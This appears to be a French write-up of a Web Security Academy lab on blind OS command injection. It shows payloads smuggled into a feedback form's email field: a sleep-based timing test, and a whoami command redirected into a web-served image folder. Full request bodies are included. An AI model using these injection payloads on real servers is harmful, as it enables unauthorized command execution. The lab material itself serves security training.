Injection de commandes OS aveugle avec redirection de sortie

Blind OS command injection with output redirection

Lab: Blind OS command injection with output redirection | Web Security AcademyWebSecAcademy

Description du lab

L’application présente une vulnérabilité d’injection de commandes système aveugle dans la fonctionnalité de feedback.
Les données saisies par l’utilisateur sont injectées dans une commande shell côté serveur.
La sortie de cette commande n’est pas renvoyée directement dans la réponse HTTP.
Il existe cependant un dossier accessible en écriture : /var/www/images/
L’application sert les images du catalogue produits depuis ce répertoire.
On peut donc rediriger la sortie de la commande vers un fichier dans ce dossier, puis lire ce fichier via l’URL de chargement d’images.

Objectif du lab : exécuter la commande whoami et récupérer sa sortie.

;sleep 10;

Détection de l’injection (délai temporel)

On utilise le formulaire de feedback (submit feedback). Le champ email est vulnérable : lorsqu’on injecte un délai, la réponse met environ 10 secondes.

Payload injecté dans le champ email :

csrf=3dBtfZovWVNJXDv2aXCkmfAOSH9tQt7h&name=hello&email=hello%40gmail.com;sleep 10;&subject=hello&message=hello1234

Le délai de 10 secondes confirme l’injection de commande.

Exploitation avec redirection de sortie

But : rediriger la sortie de whoami vers un fichier dans /var/www/images/.

Payload injecté dans le champ email :

;whoami > /var/www/images/test.txt;

Exemple de corps de requête :

csrf=3dBtfZovWVNJXDv2aXCkmfAOSH9tQt7h&name=hello&email=hello%40gmail.com;whoami > /var/www/images/test.txt;&subject=hello&message=hello1234

Cette commande crée (ou écrase) le fichier test.txt dans le répertoire accessible depuis le web.

/image?filename=test.txt

Récupération du résultat

Pour lire la sortie de whoami enregistrée dans le fichier, on appelle l’URL qui sert les fichiers du dossier d’images :

Mis à jour il y a 2 jours

Ce contenu vous a-t-il été utile ?